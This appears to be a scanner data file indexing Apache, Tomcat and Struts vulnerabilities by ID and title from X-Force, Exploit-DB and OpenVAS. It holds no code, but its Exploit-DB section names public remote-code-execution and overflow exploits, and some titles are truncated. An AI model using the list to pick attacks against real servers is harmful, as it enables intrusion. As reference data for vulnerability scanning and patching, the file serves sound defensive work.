| [13125] Apache::Gallery Inline::C could allow arbitrary code execution
| [13086] Apache Jakarta Tomcat mod_jk format string allows remote access
| [12681] Apache HTTP Server mod_proxy could allow mail relaying
| [12662] Apache HTTP Server rotatelogs denial of service
| [12554] Apache Tomcat stores password in plain text
| [12553] Apache HTTP Server redirects and subrequests denial of service
| [12552] Apache HTTP Server FTP proxy server denial of service
| [12551] Apache HTTP Server prefork MPM denial of service
| [12550] Apache HTTP Server weaker than expected encryption
| [12549] Apache HTTP Server type-map file denial of service
| [12206] Apache Tomcat /opt/tomcat directory insecure permissions
| [12102] Apache Jakarta Tomcat MS-DOS device name request denial of service
| [12091] Apache HTTP Server apr_password_validate denial of service
| [12090] Apache HTTP Server apr_psprintf code execution
| [11804] Apache HTTP Server mod_access_referer denial of service
| [11750] Apache HTTP Server could leak sensitive file descriptors
| [11730] Apache HTTP Server error log and access log terminal escape sequence injection
| [11703] Apache long slash path allows directory listing
| [11695] Apache HTTP Server LF (Line Feed) denial of service
| [11694] Apache HTTP Server filestat.c denial of service
| [11438] Apache HTTP Server MIME message boundaries information disclosure
| [11412] Apache HTTP Server error log terminal escape sequence injection
| [11196] Apache Tomcat examples and ROOT Web applications cross-site scripting
| [11195] Apache Tomcat web.xml could be used to read files
| [11194] Apache Tomcat URL appended with a null character could list directories
| [11139] Apache HTTP Server mass virtual hosting with mod_rewrite or mod_vhost_alias could allow an attacker to obtain files
| [11126] Apache HTTP Server illegal character file disclosure
| [11125] Apache HTTP Server DOS device name HTTP POST code execution
| [11124] Apache HTTP Server DOS device name denial of service
| [11088] Apache HTTP Server mod_vhost_alias CGI source disclosure
| [10938] Apache HTTP Server printenv test CGI cross-site scripting
| [10771] Apache Tomcat mod_jk module multiple HTTP GET request buffer overflow
| [10575] Apache mod_php module could allow an attacker to take over the httpd process
| [10499] Apache HTTP Server WebDAV HTTP POST view source
| [10457] Apache HTTP Server mod_ssl "
| [10415] Apache HTTP Server htdigest insecure system() call could allow command execution
| [10414] Apache HTTP Server htdigest multiple buffer overflows
| [10413] Apache HTTP Server htdigest temporary file race condition
| [10412] Apache HTTP Server htpasswd temporary file race condition
| [10376] Apache Tomcat invoker servlet used in conjunction with the default servlet reveals source code
| [10348] Apache Tomcat HTTP GET request DOS device reference could cause a denial of service
| [10281] Apache HTTP Server ab.c ApacheBench long response buffer overflow
| [10280] Apache HTTP Server shared memory scorecard overwrite
| [10263] Apache Tomcat mod_jk or mod_jserv connector directory disclosure
| [10241] Apache HTTP Server Host: header cross-site scripting
| [10230] Slapper worm variants A, B, and C target OpenSSL/Apache systems
| [10208] Apache HTTP Server mod_dav denial of service
| [10206] HP VVOS Apache mod_ssl denial of service
| [10200] Apache HTTP Server stderr denial of service
| [10175] Apache Tomcat org.apache.catalina.servlets.DefaultServlet reveals source code
| [10169] Slapper worm variant (Slapper.C) targets OpenSSL/Apache systems
| [10154] Slapper worm variant (Slapper.B) targets OpenSSL/Apache systems
| [10098] Slapper worm targets OpenSSL/Apache systems
| [9876] Apache HTTP Server cgi/cgid request could disclose the path to a requested script
| [9875] Apache HTTP Server .var file request could disclose installation path
| [9863] Apache Tomcat web.xml file could allow a remote attacker to bypass restrictions
| [9808] Apache HTTP Server non-Unix version URL encoded directory traversal
| [9623] Apache HTTP Server ap_log_rerror() path disclosure
| [9520] Apache Tomcat /servlet/ mapping cross-site scripting
| [9415] Apache HTTP Server mod_ssl .htaccess off-by-one buffer overflow
| [9396] Apache Tomcat null character to threads denial of service
| [9394] Apache Tomcat HTTP request for LPT9 reveals Web root path
| [9249] Apache HTTP Server chunked encoding heap buffer overflow
| [9208] Apache Tomcat sample file requests could reveal directory listing and path to Web root directory
| [8932] Apache Tomcat example class information disclosure
| [8633] Apache HTTP Server with mod_rewrite could allow an attacker to bypass directives
| [8629] Apache HTTP Server double-reverse DNS lookup spoofing
| [8589] Apache HTTP Server for Windows DOS batch file remote command execution
| [8457] Oracle9i Application Server Apache PL/SQL HTTP Location header buffer overflow
| [8455] Oracle9i Application Server default installation could allow an attacker to access certain Apache Services
| [8400] Apache HTTP Server mod_frontpage buffer overflows
| [8326] Apache HTTP Server multiple MIME headers (sioux) denial of service
| [8308] Apache "
| [8275] Apache HTTP Server with Multiviews enabled could disclose directory contents
| [8119] Apache and PHP OPTIONS request reveals "
| [8054] Apache is running on the system
| [8029] Mandrake Linux default Apache configuration could allow an attacker to browse files and directories
| [8027] Mandrake Linux default Apache configuration has remote management interface enabled
| [8026] Mandrake Linux Apache sample programs could disclose sensitive information about the server
| [7836] Apache HTTP Server log directory denial of service
| [7815] Apache for Windows "
| [7810] Apache HTTP request could result in unexpected behavior
| [7599] Apache Tomcat reveals installation path
| [7494] Apache "
| [7419] Apache Web Server could allow remote attackers to overwrite .log files
| [7363] Apache Web Server hidden HTTP requests
| [7249] Apache mod_proxy denial of service
| [7129] Linux with Apache Web server could allow an attacker to determine if a specified username exists
| [7103] Apple Mac OS X used with Apache Web server could disclose directory contents
| [7059] Apache "
| [7057] Apache "
| [7056] Apache "
| [7055] Apache "
| [7054] Apache "
| [6997] Apache Jakarta Tomcat error message may reveal information
| [6971] Apache Jakarta Tomcat may reveal JSP source code with missing HTTP protocol specification
| [6970] Apache crafted HTTP request could reveal the internal IP address
| [6921] Apache long slash path allows directory listing
| [6687] Apple Mac OS X used with Apache Web server could allow arbitrary file disclosure
| [6527] Apache Web Server for Windows and OS2 denial of service
| [6316] Apache Jakarta Tomcat may reveal JSP source code
| [6305] Apache Jakarta Tomcat directory traversal
| [5926] Linux Apache symbolic link
| [5659] Apache Web server discloses files when used with php script
| [5310] Apache mod_rewrite allows attacker to view arbitrary files
| [5204] Apache WebDAV directory listings
| [5197] Apache Web server reveals CGI script source code
| [5160] Apache Jakarta Tomcat default installation
| [5099] Trustix Secure Linux installs Apache with world writable access
| [4968] Apache Jakarta Tomcat snoop servlet gives out information which could be used in attack
| [4967] Apache Jakarta Tomcat 404 error reveals the pathname of the requested file
| [4931] Apache source.asp example file allows users to write to files
| [4575] IBM HTTP Server running Apache allows users to directory listing and file retrieval
| [4205] Apache Jakarta Tomcat delivers file contents
| [2084] Apache on Debian by default serves the /usr/doc directory
| [1630] MessageMedia UnityMail and Apache Web server MIME header flood denial of service
| [697] Apache HTTP server beck exploit
| [331] Apache cookies buffer overflow
|
| Exploit-DB - https://www.exploit-db.com:
| [31130] Apache Tomcat <= 6.0.15 Cookie Quote Handling Remote Information Disclosure Vulnerability
| [31052] Apache <= 2.2.6 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability
| [30901] Apache HTTP Server 2.2.6 Windows Share PHP File Extension Mapping Information Disclosure Vulnerability
| [30835] Apache HTTP Server <= 2.2.4 413 Error HTTP Request Method Cross-Site Scripting Weakness
| [30563] Apache Tomcat <= 5.5.15 Cal2.JSP Cross-Site Scripting Vulnerability
| [30496] Apache Tomcat <= 6.0.13 Cookie Handling Quote Delimiter Session ID Disclosure
| [30495] Apache Tomcat <= 6.0.13 Host Manager Servlet Cross Site Scripting Vulnerability
| [30191] Apache MyFaces Tomahawk JSF Framework 1.1.5 Autoscroll Parameter Cross Site Scripting Vulnerability
| [30189] Apache Tomcat <= 6.0.13 JSP Example Web Applications Cross Site Scripting Vulnerability
| [30052] Apache Tomcat 6.0.10 Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities
| [29930] Apache AXIS 1.0 Non-Existent WSDL Path Information Disclosure Vulnerability
| [29859] Apache Roller OGNL Injection
| [29739] Apache HTTP Server Tomcat 5.x/6.0.x Directory Traversal Vulnerability
| [29435] Apache Tomcat 5.5.25 - CSRF Vulnerabilities
| [29316] Apache + PHP 5.x - Remote Code Execution (Multithreaded Scanner) (2)
| [29290] Apache / PHP 5.x Remote Code Execution Exploit
| [28713] Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object RCE
| [28424] Apache 2.x HTTP Server Arbitrary HTTP Request Headers Security Weakness
| [28365] Apache 2.2.2 CGI Script Source Code Information Disclosure Vulnerability
| [28254] Apache Tomcat 5 Information Disclosure Vulnerability
| [27915] Apache James 2.2 SMTP Denial of Service Vulnerability
| [27397] Apache suEXEC Privilege Elevation / Information Disclosure
| [27135] Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
| [27096] Apache Geronimo 1.0 Error Page XSS
| [27095] Apache Tomcat / Geronimo 1.0 Sample Script cal2.jsp time Parameter XSS
| [26710] Apache CXF prior to 2.5.10, 2.6.7 and 2.7.4 - Denial of Service
| [26542] Apache Struts 1.2.7 Error Response Cross-Site Scripting Vulnerability
| [25986] Plesk Apache Zeroday Remote Exploit
| [25980] Apache Struts includeParams Remote Code Execution
| [25625] Apache 1.3.x HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (2)
| [25624] Apache 1.3.x HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (1)
| [24874] Apache Struts ParametersInterceptor Remote Code Execution
| [24744] Apache Rave 0.11 - 0.20 - User Information Disclosure
| [24694] Apache 1.3.x mod_include Local Buffer Overflow Vulnerability
| [24590] Apache 2.0.x mod_ssl Remote Denial of Service Vulnerability
| [23751] Apache Cygwin 1.3.x/2.0.x Directory Traversal Vulnerability
| [23581] Apache 2.0.4x mod_perl Module File Descriptor Leakage Vulnerability
| [23482] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (2)
| [23481] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (1)
| [23296] Red Hat Apache 2.0.40 Directory Index Default Configuration Error
| [23282] apache cocoon 2.14/2.2 - Directory Traversal vulnerability
| [23245] Apache Tomcat 4.0.x Non-HTTP Request Denial of Service Vulnerability
| [23119] Apache::Gallery 0.4/0.5/0.6 Insecure Local File Storage Privilege Escalation Vulnerability
| [22505] Apache Mod_Access_Referer 1.0.2 NULL Pointer Dereference Denial of Service Vulnerability
| [22205] Apache Tomcat 3.x Null Byte Directory/File Disclosure Vulnerability
| [22191] Apache Web Server 2.0.x MS-DOS Device Name Denial of Service Vulnerability
| [22068] Apache 1.3.x,Tomcat 4.0.x/4.1.x Mod_JK Chunked Encoding Denial of Service Vulnerability
| [21885] Apache 1.3/2.0.x Server Side Include Cross Site Scripting Vulnerability
| [21882] Apache Tomcat 3.2 Directory Disclosure Vulnerability
| [21854] Apache 2.0.39/40 Oversized STDERR Buffer Denial of Service Vulnerability
| [21853] Apache Tomcat 3/4 DefaultServlet File Disclosure Vulnerability
| [21734] Apache Tomcat 4.1 JSP Request Cross Site Scripting Vulnerability
| [21719] Apache 2.0 Path Disclosure Vulnerability
| [21697] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
| [21605] Apache Tomcat 4.0.3 DoS Device Name Cross Site Scripting Vulnerability
| [21604] Apache Tomcat 4.0.3 Servlet Mapping Cross Site Scripting Vulnerability
| [21560] Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (2)
| [21559] Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (1)
| [21534] Apache Tomcat 3/4 JSP Engine Denial of Service Vulnerability
| [21492] Apache Tomcat 3.2.3/3.2.4 RealPath.JSP Malformed Request Information Disclosure
| [21491] Apache Tomcat 3.2.3/3.2.4 Example Files Web Root Path Disclosure
| [21490] Apache Tomcat 3.2.3/3.2.4 Source.JSP Malformed Request Information Disclosure
| [21412] Apache Tomcat 4.0/4.1 Servlet Path Disclosure Vulnerability
| [21350] Apache Win32 1.3.x/2.0.x Batch File Remote Command Execution Vulnerability
| [21204] Apache 1.3.20 Win32 PHP.EXE Remote File Disclosure Vulnerability
| [21112] Red Hat Linux 7.0 Apache Remote Username Enumeration Vulnerability
| [21067] Apache 1.0/1.2/1.3 Server Address Disclosure Vulnerability
| [21002] Apache 1.3 Possible Directory Index Disclosure Vulnerability
| [20911] Apache 1.3.14 Mac File Protection Bypass Vulnerability
| [20716] apache tomcat 3.0 - Directory Traversal vulnerability
| [20695] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (4)
| [20694] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (3)
| [20693] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (2)
| [20692] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (1)
| [20595] NCSA 1.3/1.4.x/1.5,Apache httpd 0.8.11/0.8.14 ScriptAlias Source Retrieval Vulnerability
| [20558] Apache 1.2 Web Server DoS Vulnerability
| [20466] Apache 1.3 Web Server with Php 3 File Disclosure Vulnerability
| [20435] Apache 0.8.x/1.0.x,NCSA httpd 1.x test-cgi Directory Listing Vulnerability
| [20272] Apache 1.2.5/1.3.1,UnityMail 2.0 MIME Header DoS Vulnerability
| [20210] Apache 1.3.12 WebDAV Directory Listings Vulnerability
| [20131] Apache Tomcat 3.1 Path Revealing Vulnerability
| [19975] Apache 1.3.6/1.3.9/1.3.11/1.3.12/1.3.20 Root Directory Access Vulnerability
| [19828] Cobalt RaQ 2.0/3.0 Apache .htaccess Disclosure Vulnerability
| [19536] Apache <= 1.1,NCSA httpd <= 1.5.2,Netscape Server 1.12/1.1/2.0 a nph-test-cgi Vulnerability
| [19231] PHP apache_request_headers Function Buffer Overflow
| [18984] Apache Struts <= 2.2.1.1 - Remote Command Execution
| [18897] Oracle Weblogic Apache Connector POST Request Buffer Overflow
| [18619] Apache Tomcat Remote Exploit (PUT Request) and Account Scanner
| [18452] Apache Struts Multiple Persistent Cross-Site Scripting Vulnerabilities
| [18442] Apache httpOnly Cookie Disclosure
| [18329] Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities
| [18221] Apache HTTP Server Denial of Service
| [17969] Apache mod_proxy Reverse Proxy Exposure Vulnerability PoC
| [17696] Apache httpd Remote Denial of Service (memory exhaustion)
| [17691] Apache Struts < 2.2.0 - Remote Command Execution
| [16798] Apache mod_jk 1.2.20 Buffer Overflow
| [16782] Apache Win32 Chunked Encoding
| [16752] Apache module mod_rewrite LDAP protocol Buffer Overflow
| [16317] Apache Tomcat Manager Application Deployer Authenticated Code Execution
| [15710] Apache Archiva 1.0 - 1.3.1 CSRF Vulnerability
| [15319] Apache 2.2 (Windows) Local Denial of Service
| [14617] Apache JackRabbit 2.0.0 webapp XPath Injection
| [14489] Apache Tomcat < 6.0.18 utf8 - Directory Traversal vulnerability
| [12721] Apache Axis2 1.4.1 - Local File Inclusion Vulnerability
| [12689] Authenticated Cross-Site Scripting Vulnerability (XSS) within Apache Axis2 administration console
| [12343] Apache Tomcat 5.5.0 to 5.5.29 & 6.0.0 to 6.0.26 - Information Disclosure Vulnerability
| [12330] Apache OFBiz - Multiple XSS
| [12264] Apache OFBiz - FULLADMIN Creator PoC Payload
| [12263] Apache OFBiz - SQL Remote Execution PoC Payload
| [11662] Apache Spamassassin Milter Plugin Remote Root Command Execution
| [11650] Apache 2.2.14 mod_isapi Dangling Pointer Remote SYSTEM Exploit
| [10811] Joomla.Tutorials GHDB: Apache directory listing Download Vulnerability
| [10292] Apache Tomcat 3.2.1 - 404 Error Page Cross Site Scripting Vulnerability
| [9995] Apache Tomcat Form Authentication Username Enumeration Weakness
| [9994] Apache Tomcat Cookie Quote Handling Remote Information Disclosure Vulnerability
| [9993] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
| [8842] Apache mod_dav / svn Remote Denial of Service Exploit
| [8458] Apache Geronimo <= 2.1.3 - Multiple Directory Traversal Vulnerabilities
| [7264] Apache Tomcat runtime.getRuntime().exec() Privilege Escalation (win)
| [6229] apache tomcat < 6.0.18 utf8 - Directory Traversal vulnerability
| [6100] Apache mod_jk 1.2.19 Remote Buffer Overflow Exploit (win32)
| [6089] Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit
| [5386] Apache Tomcat Connector jk2-2.0.2 (mod_jk2) Remote Overflow Exploit
| [5330] Apache 2.0 mod_jk2 2.0.2 - Remote Buffer Overflow Exploit (win32)
| [4552] Apache Tomcat (webdav) Remote File Disclosure Exploit (ssl support)
| [4530] Apache Tomcat (webdav) Remote File Disclosure Exploit
| [4162] Apache Tomcat Connector (mod_jk) Remote Exploit (exec-shield)
| [4093] Apache mod_jk 1.2.19/1.2.20 Remote Buffer Overflow Exploit
| [3996] Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)
| [3680] Apache Mod_Rewrite Off-by-one Remote Overflow Exploit (win32)
| [3384] Ubuntu/Debian Apache 1.3.33/1.3.34 (CGI TTY) Local Root Exploit
| [2237] Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC
| [2061] Apache Tomcat < 5.5.17 Remote Directory Listing Vulnerability
| [1056] Apache <= 2.0.49 Arbitrary Long HTTP Headers Denial of Service
| [855] Apache <= 2.0.52 HTTP GET request Denial of Service Exploit
| [764] Apache OpenSSL - Remote Exploit (Multiple Targets) (OpenFuckV2.c)
| [587] Apache <= 1.3.31 mod_include Local Buffer Overflow Exploit
| [466] htpasswd Apache 1.3.31 - Local Exploit
| [371] Apache HTTPd Arbitrary Long HTTP Headers DoS (c version)
| [360] Apache HTTPd Arbitrary Long HTTP Headers DoS
| [132] Apache 1.3.x - 2.0.48 - mod_userdir Remote Users Disclosure Exploit
| [126] Apache mod_gzip (with debug_mode) <= 1.2.26.1a Remote Exploit
| [67] Apache 1.3.x mod_mylo Remote Code Execution Exploit
| [38] Apache <= 2.0.45 APR Remote Exploit -Apache-Knacker.pl
| [34] Webfroot Shoutbox < 2.32 (Apache) Remote Exploit
| [11] Apache <= 2.0.44 Linux Remote Denial of Service Exploit
| [9] Apache HTTP Server 2.x Memory Leak Exploit
|
| OpenVAS (Nessus) - http://www.openvas.org:
| [902924] Apache Struts2 Showcase Skill Name Remote Code Execution Vulnerability
| [902837] PHP 'apache_request_headers()' Function Buffer Overflow Vulnerability (Windows)
| [902830] Apache HTTP Server 'httpOnly' Cookie Information Disclosure Vulnerability
| [902664] Apache Traffic Server HTTP Host Header Denial of Service Vulnerability
| [901203] Apache httpd Web Server Range Header Denial of Service Vulnerability
| [901110] Apache ActiveMQ Source Code Information Disclosure Vulnerability
| [901105] Apache OFBiz Multiple Cross Site Scripting Vulnerabilities
| [900842] Apache 'mod_proxy_ftp' Module Command Injection Vulnerability (Linux)
| [900841] Apache 'mod_proxy_ftp' Module Denial Of Service Vulnerability (Linux)
| [900573] Apache APR-Utils XML Parser Denial of Service Vulnerability
| [900572] Apache APR-Utils Multiple Denial of Service Vulnerabilities
| [900571] Apache APR-Utils Version Detection
| [900499] Apache mod_proxy_ajp Information Disclosure Vulnerability
| [900496] Apache Tiles Multiple XSS Vulnerability
| [900493] Apache Tiles Version Detection
| [900107] Apache mod_proxy_ftp Wildcard Characters XSS Vulnerability
| [900021] Apache Tomcat Cross-Site Scripting and Security Bypass Vulnerabilities
| [880086] CentOS Update for apache CESA-2008:0004-01 centos2 i386
| [870175] RedHat Update for apache RHSA-2008:0004-01
| [864591] Fedora Update for apache-poi FEDORA-2012-10835
| [864383] Fedora Update for apache-commons-compress FEDORA-2012-8428
| [864280] Fedora Update for apache-commons-compress FEDORA-2012-8465
| [864250] Fedora Update for apache-poi FEDORA-2012-7683
| [864249] Fedora Update for apache-poi FEDORA-2012-7686
| [863993] Fedora Update for apache-commons-daemon FEDORA-2011-10880
| [863466] Fedora Update for apache-commons-daemon FEDORA-2011-10936
| [855821] Solaris Update for Apache 1.3 122912-19
| [855812] Solaris Update for Apache 1.3 122911-19
| [855737] Solaris Update for Apache 1.3 122911-17
| [855731] Solaris Update for Apache 1.3 122912-17
| [855695] Solaris Update for Apache 1.3 122911-16
| [855645] Solaris Update for Apache 1.3 122912-16
| [855587] Solaris Update for kernel update and Apache 108529-29
| [855566] Solaris Update for Apache 116973-07
| [855531] Solaris Update for Apache 116974-07
| [855524] Solaris Update for Apache 2 120544-14
| [855494] Solaris Update for Apache 1.3 122911-15
| [855478] Solaris Update for Apache Security 114145-11
| [855472] Solaris Update for Apache Security 113146-12
| [855179] Solaris Update for Apache 1.3 122912-15
| [855147] Solaris Update for kernel update and Apache 108528-29
| [855077] Solaris Update for Apache 2 120543-14
| [850196] SuSE Update for apache2 openSUSE-SU-2012:0314-1 (apache2)
| [850088] SuSE Update for apache2 SUSE-SA:2007:061
| [850009] SuSE Update for apache2,apache SUSE-SA:2008:021
| [841209] Ubuntu Update for apache2 USN-1627-1
| [840900] Ubuntu Update for apache2 USN-1368-1
| [840798] Ubuntu Update for apache2 USN-1259-1
| [840734] Ubuntu Update for apache2 USN-1199-1
| [840542] Ubuntu Update for apache2 vulnerabilities USN-1021-1
| [840504] Ubuntu Update for apache2 vulnerability USN-990-2
| [840399] Ubuntu Update for apache2 vulnerabilities USN-908-1
| [840304] Ubuntu Update for apache2 vulnerabilities USN-575-1
| [840118] Ubuntu Update for libapache2-mod-perl2 vulnerability USN-488-1
| [840092] Ubuntu Update for apache2 vulnerabilities USN-499-1
| [840039] Ubuntu Update for libapache2-mod-python vulnerability USN-430-1
| [835253] HP-UX Update for Apache Web Server HPSBUX02645
| [835247] HP-UX Update for Apache-based Web Server HPSBUX02612
| [835243] HP-UX Update for Apache Running Tomcat Servlet Engine HPSBUX02579
| [835236] HP-UX Update for Apache with PHP HPSBUX02543
| [835233] HP-UX Update for Apache-based Web Server HPSBUX02531
12695| [835224] HP-UX Update for Apache-based Web Server HPSBUX02465
12696| [835200] HP-UX Update for Apache Web Server Suite HPSBUX02431
12697| [835190] HP-UX Update for Apache Web Server Suite HPSBUX02401
12698| [835188] HP-UX Update for Apache HPSBUX02308
12699| [835181] HP-UX Update for Apache With PHP HPSBUX02332
12700| [835180] HP-UX Update for Apache with PHP HPSBUX02342
12701| [835172] HP-UX Update for Apache HPSBUX02365
12702| [835168] HP-UX Update for Apache HPSBUX02313
12703| [835148] HP-UX Update for Apache HPSBUX01064
12704| [835139] HP-UX Update for Apache with PHP HPSBUX01090
12705| [835131] HP-UX Update for Apache HPSBUX00256
12706| [835119] HP-UX Update for Apache Remote Execution of Arbitrary Code HPSBUX02186
12707| [835104] HP-UX Update for Apache HPSBUX00224
12708| [835103] HP-UX Update for Apache mod_cgid HPSBUX00301
12709| [835101] HP-UX Update for Apache HPSBUX01232
12710| [835080] HP-UX Update for Apache HPSBUX02273
12711| [835078] HP-UX Update for ApacheStrong HPSBUX00255
12712| [835044] HP-UX Update for Apache HPSBUX01019
12713| [835040] HP-UX Update for Apache PHP HPSBUX00207
12714| [835025] HP-UX Update for Apache HPSBUX00197
12715| [835023] HP-UX Update for Apache HPSBUX01022
12716| [835022] HP-UX Update for Apache HPSBUX02292
12717| [835005] HP-UX Update for Apache HPSBUX02262
12718| [831759] Mandriva Update for apache-mod_security MDVSA-2012:182 (apache-mod_security)
12719| [831737] Mandriva Update for apache MDVSA-2012:154-1 (apache)
12720| [831534] Mandriva Update for apache MDVSA-2012:012 (apache)
12721| [831523] Mandriva Update for apache MDVSA-2012:003 (apache)
12722| [831491] Mandriva Update for apache MDVSA-2011:168 (apache)
12723| [831460] Mandriva Update for apache MDVSA-2011:144 (apache)
12724| [831449] Mandriva Update for apache MDVSA-2011:130 (apache)
12725| [831357] Mandriva Update for apache MDVSA-2011:057 (apache)
12726| [831132] Mandriva Update for apache MDVSA-2010:153 (apache)
12727| [831131] Mandriva Update for apache MDVSA-2010:152 (apache)
12728| [830989] Mandriva Update for apache-mod_auth_shadow MDVSA-2010:081 (apache-mod_auth_shadow)
12729| [830931] Mandriva Update for apache MDVSA-2010:057 (apache)
12730| [830926] Mandriva Update for apache MDVSA-2010:053 (apache)
12731| [830918] Mandriva Update for apache-mod_security MDVSA-2010:050 (apache-mod_security)
12732| [830799] Mandriva Update for apache-conf MDVSA-2009:300-2 (apache-conf)
12733| [830797] Mandriva Update for apache-conf MDVSA-2009:300-1 (apache-conf)
12734| [830791] Mandriva Update for apache-conf MDVA-2010:011 (apache-conf)
12735| [830652] Mandriva Update for apache MDVSA-2008:195 (apache)
12736| [830621] Mandriva Update for apache-conf MDVA-2008:129 (apache-conf)
12737| [830581] Mandriva Update for apache MDVSA-2008:016 (apache)
12738| [830294] Mandriva Update for apache MDKSA-2007:140 (apache)
12739| [830196] Mandriva Update for apache MDKSA-2007:235 (apache)
12740| [830112] Mandriva Update for apache MDKSA-2007:127 (apache)
12741| [830109] Mandriva Update for apache-mod_perl MDKSA-2007:083 (apache-mod_perl)
12742| [802425] Apache Struts2 Showcase Arbitrary Java Method Execution vulnerability
12743| [802423] Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities
12744| [802422] Apache Struts Showcase Multiple Persistence Cross-Site Scripting Vulnerabilities
12745| [802415] Apache Tomcat Multiple Security Bypass Vulnerabilities (Win)
12746| [802385] Apache Tomcat Request Object Security Bypass Vulnerability (Win)
12747| [802384] Apache Tomcat Parameter Handling Denial of Service Vulnerability (Win)
12748| [802378] Apache Tomcat Hash Collision Denial Of Service Vulnerability
12749| [801942] Apache Archiva Multiple Vulnerabilities
12750| [801940] Apache Struts2 'XWork' Information Disclosure Vulnerability
12751| [801663] Apache Struts2/XWork Remote Command Execution Vulnerability
12752| [801521] Apache APR-util 'buckets/apr_brigade.c' Denial Of Service Vulnerability
12753| [801284] Apache Derby Information Disclosure Vulnerability
12754| [801203] Apache ActiveMQ Persistent Cross-Site Scripting Vulnerability
12755| [800837] Apache 'mod_deflate' Denial Of Service Vulnerability - July09
12756| [800827] Apache 'mod_proxy_http.c' Denial Of Service Vulnerability
12757| [800680] Apache APR Version Detection
12758| [800679] Apache APR and APR-util Multiple Integer Overflow Vulnerabilities
12759| [800678] Apache Roller 'q' Parameter Cross Site Scripting Vulnerability
12760| [800677] Apache Roller Version Detection
12761| [800279] Apache mod_jk Module Version Detection
12762| [800278] Apache Struts Cross Site Scripting Vulnerability
12763| [800277] Apache Tomcat mod_jk Information Disclosure Vulnerability
12764| [800276] Apache Struts Version Detection
12765| [800271] Apache Struts Directory Traversal Vulnerability
12766| [800024] Apache Tomcat RemoteFilterValve Security Bypass Vulnerability
12767| [103333] Apache HTTP Server 'ap_pregsub()' Function Local Denial of Service Vulnerability
12768| [103293] Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability
12769| [103122] Apache Web Server ETag Header Information Disclosure Weakness
12770| [103074] Apache Continuum Cross Site Scripting Vulnerability
12771| [103073] Apache Continuum Detection
12772| [103053] Apache CouchDB Web Administration Interface Cross Site Scripting Vulnerability
12773| [101023] Apache Open For Business Weak Password security check
12774| [101020] Apache Open For Business HTML injection vulnerability
12775| [101019] Apache Open For Business service detection
12776| [100924] Apache Archiva Cross Site Request Forgery Vulnerability
12777| [100923] Apache Archiva Detection
12778| [100858] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
12779| [100814] Apache Axis2 Document Type Declaration Processing Security Vulnerability
12780| [100813] Apache Axis2 Detection
12781| [100797] Apache Traffic Server Remote DNS Cache Poisoning Vulnerability
12782| [100795] Apache Derby Detection
12783| [100762] Apache CouchDB Cross Site Request Forgery Vulnerability
12784| [100725] Apache HTTP Server Multiple Remote Denial of Service Vulnerabilities
12785| [100613] Apache ActiveMQ 'admin/queueBrowse' Cross Site Scripting Vulnerability
12786| [100514] Apache Multiple Security Vulnerabilities
12787| [100211] Apache 'Options' and 'AllowOverride' Directives Security Bypass Vulnerability
12788| [100172] Apache Web Server Configuration File Environment Variable Local Buffer Overflow Vulnerability
12789| [100171] Apache Web Server Linefeed Memory Allocation Denial Of Service Vulnerability
12790| [100130] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
12791| [72626] Debian Security Advisory DSA 2579-1 (apache2)
12792| [72612] FreeBSD Ports: apache22
12793| [71551] Gentoo Security Advisory GLSA 201206-25 (apache)
12794| [71550] Gentoo Security Advisory GLSA 201206-24 (apache tomcat)
12795| [71512] FreeBSD Ports: apache
12796| [71485] Debian Security Advisory DSA 2506-1 (libapache-mod-security)
12797| [71256] Debian Security Advisory DSA 2452-1 (apache2)
12798| [71238] Debian Security Advisory DSA 2436-1 (libapache2-mod-fcgid)
12799| [70737] FreeBSD Ports: apache
12800| [70724] Debian Security Advisory DSA 2405-1 (apache2)
12801| [70600] FreeBSD Ports: apache
12802| [70253] FreeBSD Ports: apache, apache-event, apache-itk, apache-peruser, apache-worker
12803| [70235] Debian Security Advisory DSA 2298-2 (apache2)
12804| [70233] Debian Security Advisory DSA 2298-1 (apache2)
12805| [69988] Debian Security Advisory DSA 2279-1 (libapache2-mod-authnz-external)
12806| [69338] Debian Security Advisory DSA 2202-1 (apache2)
12807| [67868] FreeBSD Ports: apache
12808| [66816] FreeBSD Ports: apache
12809| [66553] Mandriva Security Advisory MDVSA-2009:189-1 (apache-mod_auth_mysql)
12810| [66414] Mandriva Security Advisory MDVSA-2009:323 (apache)
12811| [66106] SuSE Security Advisory SUSE-SA:2009:050 (apache2,libapr1)
12812| [66081] SLES11: Security update for Apache 2
12813| [66074] SLES10: Security update for Apache 2
12814| [66070] SLES9: Security update for Apache 2
12815| [65998] SLES10: Security update for apache2-mod_python
12816| [65893] SLES10: Security update for Apache 2
12817| [65888] SLES10: Security update for Apache 2
12818| [65575] SLES9: Security update for apache2,apache2-prefork,apache2-worker
12819| [65510] SLES9: Security update for Apache 2
12820| [65472] SLES9: Security update for Apache
12821| [65467] SLES9: Security update for Apache
12822| [65450] SLES9: Security update for apache2
12823| [65390] SLES9: Security update for Apache2
12824| [65363] SLES9: Security update for Apache2
12825| [65309] SLES9: Security update for Apache and mod_ssl
12826| [65296] SLES9: Security update for webdav apache module
12827| [65283] SLES9: Security update for Apache2
12828| [65249] SLES9: Security update for Apache 2
12829| [65230] SLES9: Security update for Apache 2
